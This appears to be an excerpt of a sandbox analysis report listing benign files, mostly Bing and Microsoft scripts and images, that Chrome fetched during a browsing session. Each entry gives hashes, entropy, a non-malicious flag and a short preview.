                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:HTML document, ASCII text, with very long lines (2132)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2243
                                                                                                    Entropy (8bit):5.175583948682825
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:twJvUAmPopXrdMmgV3OKAfBaAwKFEZJBluYun8suoAu0:tIUAmPMgFAfEOFEZJBlxw8sLA/
                                                                                                    MD5:EE4808E8EB1067EE7221EACC56EB3E24
                                                                                                    SHA1:5802698FB9A9F78A4AC75763405484522309B6B1
                                                                                                    SHA-256:B2385F1425394733B11EA36D9FC25D3958C3591224F42E20D2760825CB575CF6
                                                                                                    SHA-512:6A14C1A898B156A3A9F4B99C78C954C497B0AEDD8B5B7699D82554BB356FD5413485C71E4976294FBB9DCF163A77AAC95CE26C19645DBB14C93E2C769DAB8F9B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:<script type="text/javascript" nonce="IYrzjQ3TRolZh4vXAnZ30rz6M2k9yROTlGDeNgSY1Rw=">//<![CDATA[.sj_evt && sj_evt.bind( "onRALoad", function() { var reportActivityModule = new ModernRewards.ReportActivity({"AnimateHeader":true,"IsAuthenticated":false,"DashboardUrl":"/rewards/dashboard","IsMobileClient":false,"RewardsIncrement":1,"RewardsSessionData":{"IsRewardUser":false,"IsLinkedUser":false,"IsTenantEnabled":false,"IsAadUser":false,"IsTrialUser":false,"TrialUserClaimBalance":0.0,"IsRebatesUser":false,"IsRebatesDeniedUser":true,"Balance":0,"RewardsBalance":0,"GiveBalance":0,"RebatesBalance":0.0,"IsGiveModeOn":false,"PreviousBalance":0,"GoalTrackBalance":200,"IsLevel2":false,"IsOptOut":false,"IsSuspended":false,"ShowAnimation":false,"IsRedirectedFromOldDashboard":false,"ImpressionLifeTimeCount":2,"DailyImpressionHPCount":0,"DailyImpressionSerpCount":1,"VisitedCount":2,"LastVisitTime":"2024-12-23T08:00:00Z","LastAutoOpenFlyoutTime":"0001-01-01T00:00:00","LastRewardsDashboardVisitTimeEpoch
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 43 x 12, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1049
                                                                                                    Entropy (8bit):7.709152266456816
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:por4A/+bZE41p0gId8dqMIQJgYa1JMOSY6wA8wMkf:posA/6PpdIdQqQJnaLMA6wAFMA
                                                                                                    MD5:3887806F14B6B1E3887FDD8A21BF2C3E
                                                                                                    SHA1:7A6AEA5F8D3B8FB103F63606F73E0383FEB69DBC
                                                                                                    SHA-256:6E75EFF300ACB9A3DA53628A3E34EC6749E3CF9A108784FDBAC9E12BFF690E5E
                                                                                                    SHA-512:D07645622C929A655A2ED11F5C6D66100DB784BB81D18649D5CB46CBF6C2E6BBAB1F5F76FB08FC6F2BE3BDA83094CAF4DA8EDD5C131DE852D507413D8782B4D0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR...+...........DN....sRGB.........gAMA......a.....pHYs..........o.d....IDATHK.]..e.....Wi...zSD..^.!b.YI.....3..+"a..)Fy!)j.q.....$.j]...*....13.....J....;...>..W.......y..?.wF.G..VfU....r.=...Fe.tf._.(<...&..U.:^!......Q..l?.{...`..f.rOO......j.n...g).Y.p"/|r...xOG.L.......l.\..C.S...q.'Uj.m8..TI98....S........7...<....V.....{...w:..~..u.m._g..)...i........)g#[@..5[.bR....q&.\/.el.3u..f$.C.eb.`.S..L<.^...x?... @.j3q)...nN...}$Y..'....W........K.k..._...z.l,...k..(.."..E.U.u(>....f..9rDp.^rd.X.g)|1&K;...R..Uh..........23A......O.o.......Xl2B....m..b~oy.......Y..1k7>%.<;U..9.N>..s......o......9.9.B<o.%..s,!._.+..W's..M.$#.y..I..G...|...1.J.;..-+....>.`vl_5..B.:....d....s.?..8.....\...ln osx..r...@!........-s.-b..n.~/1.m....`.H.5>T:8..,.......jU..$o..~.e....a..!..h.n...&.(..K.SV..7..3......0;.n.U...$....T..ET......r.]oL.z.....!.;....'.RE.......&.|.._.mT.......a.^.n..*..A.<.o..../9{..~......~.x.b...:.v..7._.w...|[X.Y...j}...6..
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1101
                                                                                                    Entropy (8bit):4.829151166001716
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:t0S8eLfl954T0u2y3EO1gRcDrIvQaDxijjfscC:vLfRWtPDuQKIjq
                                                                                                    MD5:91CD11CFCCA65CFACE96153268D71F63
                                                                                                    SHA1:E0BE107728D3BF41D8136220DA897D798A2AC60F
                                                                                                    SHA-256:8EE1E6D7A487C38412D7B375AC4A6BD7E47F70858055EEB7957226ADA05544BE
                                                                                                    SHA-512:4367CE147C7FA4590838F23C47819B8954858128336979E28BA116924B92660A7CBDC9A8292C45C5F26FF591F423F03DFADCB78A772DBE86AC5FBABF0B4E7711
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/4L4QdyjTv0HYE2Ig2ol9eYoqxg8.svg
                                                                                                    Preview:<svg focusable="false" width="24px" height="24px" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. <rect fill-opacity="0.2" fill="#000" x="0" y="0" width="24" height="24" rx="2"></rect>.. <g transform="translate(4, 4)">.. <path d="M13.2916881,1.29304814 L7.99395739,6.59077883 L2.69622669,1.29304814 C2.30349711,0.913737214 1.67923378,0.919161894 1.29315522,1.30524045 C0.907076669,1.691319 0.90165199,2.31558234 1.28096291,2.70831192 L6.57869361,8.00604261 L1.28096291,13.3037733 C0.90165199,13.6965029 0.907076669,14.3207662 1.29315522,14.7068448 C1.67923378,15.0929233 2.30349711,15.098348 2.69622669,14.7190371 L7.99395739,9.42130639 L13.2916881,14.7190371 C13.6844177,15.098348 14.308681,15.0929233 14.6947596,14.7068448 C15.0808381,14.3207662 15.0862628,13.6965029 14.7069519,13.3037733 L9.40922117,8.00604261 L14.7069519,2.70831192 C15.0976827,2.31746305 15.0976827,1.683897 14.7069519,1.29304814 C14.316103,0.902317288 13
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 80x80, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):4235
                                                                                                    Entropy (8bit):7.898734523462181
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:TMEavMaBIc7+JBFphz+6sqNNvCWiguEvX4hPsdYm92cv:QPwjIqNMdDWYa2cv
                                                                                                    MD5:36B4CA17B85C009242016EA22D6D24D0
                                                                                                    SHA1:C5CD9EC2535ABCF48FA254EB6DAA9D89E7FA3345
                                                                                                    SHA-256:D0B2602A62A15EEAAA9243F531E8D861DFD7A8E5D7D79F0F72728A6A1221E743
                                                                                                    SHA-512:E545F9B5EA43B54E2A37B6698538DCC1E9BA4F4E52E5706AD3D31F1E51267A395C864E9E382E9946F36CD05FD2E2CB167C4AEF7CAE11481EB420580A43DCDE08
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?id=OVFT.5f7hrp8dqe8dNBlpJZzCay&pid=News&w=80&h=80&c=14&rs=2&qlt=90
                                                                                                    Preview:......JFIF.....`.`.....C....................................................................C.......................................................................P.P.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..A.........m..8.G.g..`2p@.{V,>.....j....E....S...@Q..d..C..l^=.&.....Bcca,.l...;n.F.I.n..WK..5.....Y...ue..\&.Jl..=+..h....O....K...v_.xo...:...|....K.....{..&Y.l...9\...=[.b.<.....J..s...k..K. ....-....-^GO9...D.|....z.5..|%.L......1.*).-..F.. ....7.~.n.4e....h....l|...+j...r......&..n9..q.WC....R..mM.Ah.......F.1x..}+.|G.C.uf..+.....LY'ip..s...+.<.V
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (2830), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2830
                                                                                                    Entropy (8bit):5.31085192538729
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:elqvTe8ACvq2VPzlSJNBIAj+9JpwdPcr7buUiAmiIQ8gZ8ku1U1jm:OqKQPzc77WM0SiIQ32ku1f
                                                                                                    MD5:6F04AE221F166C20DB32901998071D82
                                                                                                    SHA1:57B9AF43EE36E3FAEDA2A3A86E7636F36135D10B
                                                                                                    SHA-256:C5380FED2484297F0EDC88B0BA865A4B735D5637BF7854999FC6D5476AE1216D
                                                                                                    SHA-512:C75C37D3E8D3DAB1420646A07921C18A71E3C569F25F2CADBA81FA58CBC49803347DCDCA3E67BB0EA2B6E761829387453FC0C0AFDF847BBE84E290102555C4BF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var QuickBackRS_Ads_NoAjax;(function(){function s(){var n=_ge("b_results");n!=null&&(t=n.querySelectorAll(k),rt(),tt(),h(o)?sessionStorage.removeItem(o):(sessionStorage[i]&&sessionStorage.removeItem(i),sessionStorage[r]&&sessionStorage.removeItem(r)))}function nt(){var n="sschkad",t="sschvad",i;try{if(typeof Storage=="undefined"||typeof sessionStorage=="undefined"||(sessionStorage.setItem(n,t),i=sessionStorage.getItem(n),sessionStorage.removeItem(n),i!=t))return!1}catch(r){return!1}return!0}function tt(){var l,a,u,s;if(f=h(i),e=h(r),l=h(o),!l&&t&&f&&e){for(n=null,a=-1,u=0;u<t.length;u++)if(s=t[u].querySelector(c),s&&f==s.innerText&&e==u.toString()){n=t[u];a=u+1;break}n&&it()}}function it(){var h=document.getElementById("inline_rs"),p=_ge(v),w,b,l,s,k,y;if(!h||!p){a();return}if(t&&n){if(typeof ClickBackRSCustomControl!="undefined"&&!ClickBackRSCustomControl)for(w=n.offsetHeight-g,Lib.CssClass.add(n,"qbrs"),n.setAttribute("data-oAH",w+"px"),n.appendChild(h),Lib.CssClass.remove(h,"b_hide"
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 53 x 12, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1591
                                                                                                    Entropy (8bit):7.825806667159923
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Jt24EHVomy99TFO7SmsrAzRTmBLbtTM2uTok7SemuvNRePD9n8AuwlFynTjhfITQ:Jum9TFOw+TiTMok7SesR8A3F8T9Ay1
                                                                                                    MD5:2FECE3531698E70623E13F45393733E4
                                                                                                    SHA1:F904AD004ED81D6FD6EC16CC29685327F2E3EA95
                                                                                                    SHA-256:2B7A5B78F928B02DB3CA8EB7F74101B5B897C9E487F2119277D9CD113D59C75A
                                                                                                    SHA-512:29AC2E72CD32E31B1AA49C9BCCAB92BB4A92CE1AD94B35FB2DA7EEF774769F22548307A60A2CF012FC368B94720F18A994F4F14EEF52AD3603158565B7AA93F3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR...5................sRGB.........gAMA......a.....pHYs..........o.d....IDATHK}VilTU.~.....m.....u.2.4...F.q.5.....!.H4...!n. ...h")"N.-3C[.b..XLT\.....V.YjY.2~..{u .In_.9.{...Q..55NAu.WX[....TA..\Q.R.Bn~.p..dO...5.U....B\...XNI]4P..(#S%.XcQ...%...d.i{jmA..,e.e...j<...'.....3d]...).n..t.om.=.V..p....P...+...(O.K .....E...E.g]a....n...Li.u......f..}..l7.D..j..=.<......;+&.N.\~H.Jl$...~.(.s..........\.Tf.l..f.......O.f...G.>..B.4.@f.y=..K.... _.o...n..,..Y.]'......./K..jN...p~...+....DP.i.'.3.....i.36/.+..%..0_C......X.Sj..*.V......)a..PJ...e.,..$..CV7..r..cW:.uU..ocQ.p..(.W'.O..5,__..#.O..0S ..e.....K..aw7.HP@..-.*...7..Z.G\..s/R...^~]...d.F7q..U..?.3(k..0.!...'x..SN.5..nk.9d......I=.?%UfgQ.>l..+....../.........\...dK...7........0...x....o S?.1\xs >..I<......4...).|.....p.3... ...........9.X..g5...$..#.{.$.9@}.........i.6;YM..Ia...vW....qF...I.vDc....@.@.XjM...8.M.u..]....."k.p~..x.1...+..4..R_...y.c.....+I.............X..A$5c^3.x#.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1094 x 761, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):489526
                                                                                                    Entropy (8bit):7.995720041871589
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:6144:aKimPYeigxfUPOwwMSavIHHukSrlKdZmzrC41zbxJa9ZqHqqzM0pZAyeRLqtt3LP:aKPFyOziIHOEgz2izjDANRLsl+4H7
                                                                                                    MD5:708BCC570AD4887E2C1854014B472FC0
                                                                                                    SHA1:768539D7A0EF0061097FF3AE0895EE437D543A13
                                                                                                    SHA-256:88A8CE64B7B33A367FC73338F5E319B3546DD782E0336CCA07D00A54B5C51DA0
                                                                                                    SHA-512:9E35EBDE9BBC942B2F1ECDD7A700D2822B651EC1682B27BB14936A683A5E7288D6F151B3299B2D423B2A2526516519991B7F967F1A466936E91EDAB4CAC13F8B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR...F...........!.....pHYs.........&.:4....sRGB.........gAMA......a...w.IDATx.....$.Y.....O....l..]..*.d...d...X`0.^....{...\s...K...m0..m0`2.e..]m........t.t..}...{...l.vv..nMwW..>U.....=..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (544), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):544
                                                                                                    Entropy (8bit):4.772516232892929
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:9pX6gew8RhA+a388RhAo6VB288RhAo6V1qxD:XXFe3cN3Tcjr2Tcj+xD
                                                                                                    MD5:2AC240E28F5C156E62CF65486FC9CA2A
                                                                                                    SHA1:1F143A24D7BC4A1A3D9F91F49F2E1BA2B1C3D487
                                                                                                    SHA-256:4325982915D0A661F3F0C30C05EB11A94CB56736D448FDC0313143818741FAA3
                                                                                                    SHA-512:CB90CF76CD9DC16829A3FF12BE5274BD26A94097AD036F199151F1C88534A15BBB8F8DAFDD699E51DF5C38E73C925C00728F807B20C0B097A5842963525BAF4B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/HxQ6JNe8Sho9n5H0ny4borHD1Ic.js
                                                                                                    Preview:var Orientation;(function(n){function f(n){var f=_w.innerWidth,e;i&&(e=window.matchMedia("(orientation: portrait)"),e.addListener(function(t){_w.innerWidth!=f&&(f=_w.innerWidth,n(!t.matches))}));t&&sj_be(_w,u,function(){_w.innerWidth!=f&&(f=_w.innerWidth,n(_w.innerWidth>_w.innerHeight))});i||t||r||sb_si(function(){_w.innerWidth!=f&&(f=_w.innerWidth,n(_w.innerWidth>_w.innerHeight))},1e3)}var i="matchMedia"in _w,t="onorientationchange"in _w,r="onresize"in _w,u=t?"orientationchange":"resize";n.onOrientation=f})(Orientation||(Orientation={}))
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):726
                                                                                                    Entropy (8bit):4.636787858533541
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:tbH41nlcWYiB1+Xl0ML2t1iOfEmmgaUEUZQ6nMAIPWSxs4yPISEIe9t8aayPISEx:t741nTYifqLL2+O7mgaxSQ6MFnE3nkO
                                                                                                    MD5:6601E4A25AB847203E1015B32514B16C
                                                                                                    SHA1:282FE75F6FED3CFC85BD5C3544ADB462ED45C839
                                                                                                    SHA-256:6E5D3FFF70EEC85FF6D42C84062076688CB092A3D605F47260DBBE6B3B836B21
                                                                                                    SHA-512:305C325EAD714D7BCBD25F3ACED4D7B6AED6AE58D7D4C2F2DFFCE3DFDEB0F427EC812639AD50708EA08BC79E4FAD8AC2D9562B142E0808936053715938638B7C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/KC_nX2_tPPyFvVw1RK20Yu1FyDk.svg
                                                                                                    Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" enable-background="new 0 0 16 16">.. <path d="M0 0h16v16h-16v-16z" fill="none"/>.. <path fill="#007DAA" d="M11 4h4l-5-4v3c0 .552.447 1 1 1zm-3-1v-3h-4.5c-.828 0-1.5.672-1.5 1.5v13c0 .828.672 1.5 1.5 1.5h10c.828 0 1.5-.672 1.5-1.5v-8.5h-4c-1.654 0-3-1.346-3-3zm4.707 10.707c-.181.181-.431.293-.707.293h-7c-.276 0-.526-.112-.707-.293s-.293-.431-.293-.707.112-.526.293-.707.431-.293.707-.293h7c.276 0 .526.112.707.293s.293.431.293.707-.112.526-.293.707zm0-5.414c.181.181.293.431.293.707s-.112.526-.293.707-.431.293-.707.293h-7c-.276 0-.526-.112-.707-.293s-.293-.431-.293-.707.112-.526.293-.707.431-.293.707-.293h7c.276 0 .526.112.707.293z"/>..</svg>
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (42133)
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):138268
                                                                                                    Entropy (8bit):5.224497765711851
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:1f4HuF7pxnISnJ9d1EwgXA7CisuMK/xw/:1f4Hu1I+Tw/
                                                                                                    MD5:5B85413B96AF340238B93068CDB641FB
                                                                                                    SHA1:D949C985DF4F80FAB0CF036A1DD86C63CA342F1F
                                                                                                    SHA-256:1B448C19C6DF1F2D15399A710A73BB3EC0C5233B571CDFAE9CCA315E6E13FB85
                                                                                                    SHA-512:5B7E26BB4C72A8D8EE6CD20EEEA354ADD396F74289BD3E42CD1D6C8A5D3FA1B190CC62B953CAF4FA38EFDA0983F90F937276C8797EB2E1BADC11F9F5161117CE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://www.microsoft.com/onerfstatics/marketingsites-eus-prod/shell/_scrf/js/themes=default/54-af9f9f/d4-fb1f57/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/f9-a5b2ce/db-bc0148/dc-7e9864/6d-c07ea1/6f-dafe8c/f6-aa5278/73-a24d00/6d-1e7ed0/b7-cadaa7/c4-898cf2/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/d0-e64f3e/92-10345d/79-499886/7e-cda2d3/58-ab4971/74-d51c79/e0-3c9860/de-884374/1f-100dea/33-abe4df/2b-8e0ae6?ver=2.0&_cf=02242021_3231&iife=1
                                                                                                    Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (2554), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2554
                                                                                                    Entropy (8bit):5.095671803892078
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:btOMIttapPl5yYt+8XYoVN8etAqCITj4Ut5ZQ2gURAUCpLvcs:ZjIttapZI0P4Ut5ZQCRAUCpLvcs
                                                                                                    MD5:1B4B9D03F96BDC877DDC14801B367AD4
                                                                                                    SHA1:0B74EE1F0ACE124FB845338583FAFBC05EEE3DBE
                                                                                                    SHA-256:D2F3BAFC7018AF432DA2135981E3800FC4D5FE4B254AB3605A84BB183167608C
                                                                                                    SHA-512:F52C6595B0A95F497BD6A988188041C6B40031791EDD36F6FA7517C6E48BF5FD5BD6C0421B43B6E9830516A7C64350A35C18324FDDC87747653DDF6BBCD43764
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var UnifiedAnswerGutter;(function(n){function w(n,t,i){i===void 0&&(i=null);t.style.opacity="0";sb_st(function(){Lib.CssClass.add(t,s);n.style.opacity="1";Lib.CssClass.remove(n,s);i&&i()},0)}function b(n){return Lib.CssClass.contains(n,i)}function u(n){return _ge(t(n,"content"))}function t(n,t,i){if(i===void 0&&(i=null),!n)return null;var r="data-"+t;return i===null?n.getAttribute(r):(n.setAttribute(r,i),i)}function f(n,i){return i===void 0&&(i=null),i===null?parseInt(t(n,o),10):(t(n,o,i.toString()),i)}function d(n){return t(n,r)?!1:!0}function g(n,t){var r,i;n&&(r=new p(n,t),r.valid&&(i=_ge(h),i&&LGUtility.isRenderFeature(e)&&LGWidget.initWidget(e,i.parentElement,null,!0,!1)))}var e="UnifiedAnswerGutterWidget",h="ua_ans",o="gtabidx",i="ua_gtrtb_active",s="b_hide",r="dataurl",c="favicon",l="GutterTabAjax",a="ua_tfil-ajaxError",v="ua_tfil-ajaxCompleted",y="ua_tfil-ajaxLoad ua_flex",p=function(){function n(n,t){var i=this,e,u,r;if(i.container=_ge(n),i.ajaxErrMsg=t,i.container){for(e=i.co
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (65188)
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):77391
                                                                                                    Entropy (8bit):5.274343929479743
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:986uWt+5MaZ+sefChTFh7g58k0D5ChKt/w976PZM+dfWXNWfGh22m9oCcQhS9Chx:W6uWy/fW8k0kcPySW9mFbiIZ
                                                                                                    MD5:13B147A683AF38608F9C22EE9D66A832
                                                                                                    SHA1:F9291CD3A214674A186F4BE85CDC655A6B3A31FA
                                                                                                    SHA-256:F0B2216568BB538A00EE14C13AD49EA15B1653044A219A698889610EDCF9BF05
                                                                                                    SHA-512:1C4DEB1CF689906DD026C6FE7383CFAC8F1BEABAC05DC65309A35F60CB70EBED45D265351B8B6D35382C5136815E0809772A48E242608E309BECB9B7078CAB17
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/-Skc06IUZ0oYb0voXNxlWms6Mfo.js
                                                                                                    Preview:/**.* -------------------------------------------------------------------------------------------.* Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License..* See License in the project root for license information..* -------------------------------------------------------------------------------------------.*/.var MicrosoftGraph=function(e){"use strict";function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function r(e){return r="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},r(e)}function n(e){var t=function(e,t){if("object"!==r(e)||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var i=n.call(e,t||"default");if("object"!==r(i))return i;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===t?String:Number)(e)}(e,"st
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (10077), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10077
                                                                                                    Entropy (8bit):5.3656127544424095
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:2KchVqrW2s8uu5Mc/RiEVCqAbmGevp+1JUpqtCTHcC+FOXFvHYH7lK0f9Tk47jUB:2KchVGW2se5MKiEVwmiup9+UXRHQ7lKl
                                                                                                    MD5:BF0CCA35DCA6862F227A308A1093624F
                                                                                                    SHA1:D16DC418E22DD37A6A0D304AC9B7DB12C9A1DFA4
                                                                                                    SHA-256:43431D5B3D022E0E5B7B7EB1B1745F90E845545B909C9AB8FFB37302EAAC113D
                                                                                                    SHA-512:0226E0DF2FF18C9B6B0057F8621AE9EAA2334677232CF21F00BFE9761DF95E0430B797985347A7F6BCB7BD23B3653B1BF0443D821125DC82250F2E521F8DDDF8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var bepns=bepns||function(n,t){function ai(){var n=this;sj_be(_w,"message",ki,!1);vi();sj_evt.bind("OpenGoBigFlyout",function(){return a(null)},1);sj_evt.bind("OpenGoBigFlyoutL2",tr,1);f&&sj_be(f,"click",a,!1);sj_evt.bind("AutoOpenFlyout",function(){k=!0;p||!p&&nr()>=1200?l(r,"b_hide")?lt(n.evt,!1):w=fi:w=ei;w&&typeof LightLogger!="undefined"&&LightLogger&&LightLogger.logInstrumentationV2(null,LightLogger.InstrumentationEventType.Init,ui,!0,{SuppressionReason:w})},!0);sj_evt.bind("AutoOpenFlyoutHide",function(){i&&o(null,!0,!1)},!0);sj_evt.bind(rt,bi);sj_evt.bind("onP1",wi,1);sj_evt.bind("id:refreshed",yi,1);window.addEventListener("click",function(){o(null,!1,!0)})}var yt="redDotControl",pt="rh_meter_leaf_homepage",wt="rh_meter_leaf",bt="givemuid_heart_homepage",kt="GiveMuid",dt="GiveSerp",gt="hub_apps_698b01b4-557a-4a3b-9af7-a7e8138e8372",ni="SUCCESS",v="_RwBf",ti="aad",ii="lka",ri="lkt",g="ard",y="rwspotlight",nt="rt-chevr-nf",ui="AutoOpenFlyoutSuppression",fi="BepFlyoutMissingOrNot
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (544), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):544
                                                                                                    Entropy (8bit):4.772516232892929
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:9pX6gew8RhA+a388RhAo6VB288RhAo6V1qxD:XXFe3cN3Tcjr2Tcj+xD
                                                                                                    MD5:2AC240E28F5C156E62CF65486FC9CA2A
                                                                                                    SHA1:1F143A24D7BC4A1A3D9F91F49F2E1BA2B1C3D487
                                                                                                    SHA-256:4325982915D0A661F3F0C30C05EB11A94CB56736D448FDC0313143818741FAA3
                                                                                                    SHA-512:CB90CF76CD9DC16829A3FF12BE5274BD26A94097AD036F199151F1C88534A15BBB8F8DAFDD699E51DF5C38E73C925C00728F807B20C0B097A5842963525BAF4B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var Orientation;(function(n){function f(n){var f=_w.innerWidth,e;i&&(e=window.matchMedia("(orientation: portrait)"),e.addListener(function(t){_w.innerWidth!=f&&(f=_w.innerWidth,n(!t.matches))}));t&&sj_be(_w,u,function(){_w.innerWidth!=f&&(f=_w.innerWidth,n(_w.innerWidth>_w.innerHeight))});i||t||r||sb_si(function(){_w.innerWidth!=f&&(f=_w.innerWidth,n(_w.innerWidth>_w.innerHeight))},1e3)}var i="matchMedia"in _w,t="onorientationchange"in _w,r="onresize"in _w,u=t?"orientationchange":"resize";n.onOrientation=f})(Orientation||(Orientation={}))
